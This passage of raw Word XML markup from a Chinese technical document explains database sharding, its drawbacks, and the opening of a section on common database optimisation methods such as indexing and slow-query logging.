          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>。高并发的读写访问，</w:t>
      </w:r>
      <w:r w:rsidR="00857945" w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>Master</w:t>
      </w:r>
      <w:r w:rsidR="00857945" w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>无法承担写操作压力，不管如何扩展</w:t>
      </w:r>
      <w:r w:rsidR="00857945" w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>Slave</w:t>
      </w:r>
      <w:r w:rsidR="00857945" w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>服务器。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D417FD" w:rsidRPr="00F41A4C" w:rsidRDefault="00D417FD" w:rsidP="00076484">
      <w:pPr>
        <w:ind w:firstLine="420"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:color w:val="FF0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>必须要换一种思路，对</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t>数</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t>据库进行拆分，从而提高数据库写入能力，这就是所谓的分库。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00EA6C45" w:rsidRPr="00F41A4C" w:rsidRDefault="00EA6C45" w:rsidP="00076484">
      <w:pPr>
        <w:ind w:firstLine="420"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>与分表策略类似，分表也可以通过关键字段取模的方式，来对数据访问进行路由。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00076484" w:rsidRPr="00F41A4C" w:rsidRDefault="00076484" w:rsidP="00076484">
      <w:pPr>
        <w:ind w:firstLine="420"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00BE4AF7" w:rsidRPr="00F41A4C" w:rsidRDefault="00BE4AF7" w:rsidP="00BE4AF7">
      <w:pPr>
        <w:widowControl/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:noProof/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="5653260" cy="3036626"/>
            <wp:effectExtent l="19050" t="0" r="4590" b="0"/>
            <wp:docPr id="33" name="图片 3" descr="C:\Users\Administrator\AppData\Roaming\Tencent\Users\57548991\QQ\WinTemp\RichOle\~BX6I]6Z_}8HHNQN2OB3ZN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strator\AppData\Roaming\Tencent\Users\57548991\QQ\WinTemp\RichOle\~BX6I]6Z_}8HHNQN2OB3ZNH.png"/>
                    <pic:cNvPicPr>
                      <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
                    </pic:cNvPicPr>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId223" cstate="print"/>
                    <a:srcRect/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5653099" cy="3036539"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln w="9525">
                      <a:noFill/>
                      <a:miter lim="800000"/>
                      <a:headEnd/>
                      <a:tailEnd/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w:rsidR="00076484" w:rsidRPr="00F41A4C" w:rsidRDefault="00835C39" w:rsidP="00076484">
      <w:pPr>
        <w:ind w:firstLine="420"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t>数据库面临高并发访问</w:t>
      </w:r>
      <w:r w:rsidR="004570F1" w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t>(</w:t>
      </w:r>
      <w:r w:rsidR="004570F1" w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t>分库</w:t>
      </w:r>
      <w:r w:rsidR="004570F1" w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t>)</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>，又面对海量数据的存储问题</w:t>
      </w:r>
      <w:r w:rsidR="004570F1" w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>(</w:t>
      </w:r>
      <w:r w:rsidR="004570F1" w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>分表</w:t>
      </w:r>
      <w:r w:rsidR="004570F1" w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>)</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>，这是需要对数据库采用</w:t>
      </w:r>
      <w:r w:rsidR="00E00B49" w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>分库，又需要分表的策略，提升了并发访问，也提升了单表的查询性能，这就是分库分表。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="006B6735" w:rsidRPr="00F41A4C" w:rsidRDefault="006B6735" w:rsidP="00076484">
      <w:pPr>
        <w:ind w:firstLine="420"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>数据库经过分库分表后，虽然查询性能和并发能力提高，也带了问题：</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="006B6735" w:rsidRPr="00F41A4C" w:rsidRDefault="006B6735" w:rsidP="00ED0BCD">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="27"/>
        </w:numPr>
        <w:ind w:firstLineChars="0"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>跨表的事务上升为分布式事务</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="006B6735" w:rsidRPr="00F41A4C" w:rsidRDefault="006B6735" w:rsidP="00ED0BCD">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="27"/>
        </w:numPr>
        <w:ind w:firstLineChars="0"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>记录被分到不同库与不同表后，难以进行多表关联查询，并且必须制定路由字段进行查询</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="006B6735" w:rsidRPr="00F41A4C" w:rsidRDefault="006B6735" w:rsidP="00ED0BCD">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="27"/>
        </w:numPr>
        <w:ind w:firstLineChars="0"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>系统进一步扩展</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>(</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>路由策略变更</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>)</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>，需要重新进行数据迁移</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="006B6735" w:rsidRPr="00F41A4C" w:rsidRDefault="006B6735" w:rsidP="00ED0BCD">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="27"/>
        </w:numPr>
        <w:ind w:firstLineChars="0"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>搜索引擎能够解决采用业务拆分与分库分表策略之后，系统无法进行多表关联查询，以及查询必须带路由字段等问题。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="006B6735" w:rsidRPr="00F41A4C" w:rsidRDefault="006B6735" w:rsidP="00ED0BCD">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="27"/>
        </w:numPr>
        <w:ind w:firstLineChars="0"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>搜索引擎只能复制的组合查询，构建一张大表，能够弥补一部分数据库拆分所带来的问题。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00670541" w:rsidRPr="00F41A4C" w:rsidRDefault="00670541" w:rsidP="00670541">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:widowControl/>
        <w:ind w:left="720" w:firstLineChars="0" w:firstLine="0"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:noProof/>
          <w:kern w:val="0"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="5464995" cy="3398292"/>
            <wp:effectExtent l="19050" t="0" r="2355" b="0"/>
            <wp:docPr id="38" name="图片 5" descr="C:\Users\Administrator\AppData\Roaming\Tencent\Users\57548991\QQ\WinTemp\RichOle\UO1@9_P$A4D2[1S$ITD85{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istrator\AppData\Roaming\Tencent\Users\57548991\QQ\WinTemp\RichOle\UO1@9_P$A4D2[1S$ITD85{L.png"/>
                    <pic:cNvPicPr>
                      <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
                    </pic:cNvPicPr>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId224" cstate="print"/>
                    <a:srcRect/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5464752" cy="3398141"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln w="9525">
                      <a:noFill/>
                      <a:miter lim="800000"/>
                      <a:headEnd/>
                      <a:tailEnd/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w:rsidR="00670541" w:rsidRPr="00F41A4C" w:rsidRDefault="00670541" w:rsidP="00670541">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00C6592B" w:rsidRPr="00F41A4C" w:rsidRDefault="00C6592B" w:rsidP="00C6592B">
      <w:pPr>
        <w:pStyle w:val="3"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>3.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>7</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>常用数据库优化方法</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00670541" w:rsidRDefault="002D1A3D" w:rsidP="00113CFB">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLine="357"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F47DDA">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:color w:val="333333"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>Web</w:t>
      </w:r>
      <w:r w:rsidRPr="00F47DDA">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:color w:val="333333"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>应用瓶颈</w:t>
      </w:r>
      <w:r w:rsidR="0032301C" w:rsidRPr="00F47DDA">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:color w:val="333333"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>在数据库上，</w:t>
      </w:r>
      <w:r w:rsidR="00400373" w:rsidRPr="00F47DDA">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>数据库优化的目标无非是</w:t>
      </w:r>
      <w:r w:rsidR="00400373" w:rsidRPr="00AA684D">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="FF0000"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>避免磁盘</w:t>
      </w:r>
      <w:r w:rsidR="00400373" w:rsidRPr="00AA684D">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="FF0000"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>I/O</w:t>
      </w:r>
      <w:r w:rsidR="00400373" w:rsidRPr="00AA684D">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="FF0000"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>瓶颈、减少</w:t>
      </w:r>
      <w:r w:rsidR="00400373" w:rsidRPr="00AA684D">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="FF0000"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>CPU</w:t>
      </w:r>
      <w:r w:rsidR="00400373" w:rsidRPr="00AA684D">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="FF0000"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>利用率和减少资源竞争</w:t>
      </w:r>
      <w:r w:rsidR="00400373" w:rsidRPr="00F47DDA">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005629B3" w:rsidRDefault="005629B3" w:rsidP="00113CFB">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLine="357"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:eastAsia="宋体" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:color w:val="333333"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>索引、复合索引、避免在列上做运算、</w:t>
      </w:r>
      <w:r w:rsidR="00590F0B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:color w:val="333333"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>索引列中不能包含</w:t>
      </w:r>
      <w:r w:rsidR="00590F0B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:color w:val="333333"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>null</w:t>
      </w:r>
      <w:r w:rsidR="00590F0B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:color w:val="333333"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>值、</w:t>
      </w:r>
      <w:r w:rsidR="00590F0B" w:rsidRPr="00D63189">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:eastAsia="宋体" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>仅列出需要查询的字段</w:t>
      </w:r>
      <w:r w:rsidR="00590F0B">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:eastAsia="宋体" w:hAnsi="Tahoma" w:cs="Tahoma" w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>、</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00590F0B" w:rsidRDefault="00590F0B" w:rsidP="00113CFB">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLine="357"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:eastAsia="宋体" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:eastAsia="宋体" w:hAnsi="Tahoma" w:cs="Tahoma" w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>Join</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:eastAsia="宋体" w:hAnsi="Tahoma" w:cs="Tahoma" w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>时小表驱动大表、</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00590F0B" w:rsidRPr="00590F0B" w:rsidRDefault="007163FC" w:rsidP="00113CFB">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLine="357"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:eastAsia="宋体" w:hAnsi="Tahoma" w:cs="Tahoma" w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>开启</w:t>
      </w:r>
      <w:r w:rsidR="00590F0B">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:eastAsia="宋体" w:hAnsi="Tahoma" w:cs="Tahoma" w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>慢日志</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00843AB1" w:rsidRDefault="00843AB1" w:rsidP="00113CFB">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLine="357"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="a9"/>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:color w:val="000000"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>1</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="a9"/>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:color w:val="000000"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>、创建索引</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:color w:val="000000"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>对于查询占主要的应用来说，索引显得尤为重要。很多时候性能问题很简单的就是因为我们忘了添加索引而造成的，或者说没有添加更为有效的索引导致。如果不加索引的话，那么查找任何哪怕只是一条特定的数据都会进行一次全表扫描，如果一张表的数据量很大而符合条件的结果又很少，那么不加索引会引起致命的性能下降。但是也不是什么情况都非得建索引不可，比如性别可能就只有两个值，建索引不仅没什么优势，还会影响到更新速度，这被称为过度索引。</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:color w:val="000000"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="a9"/>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
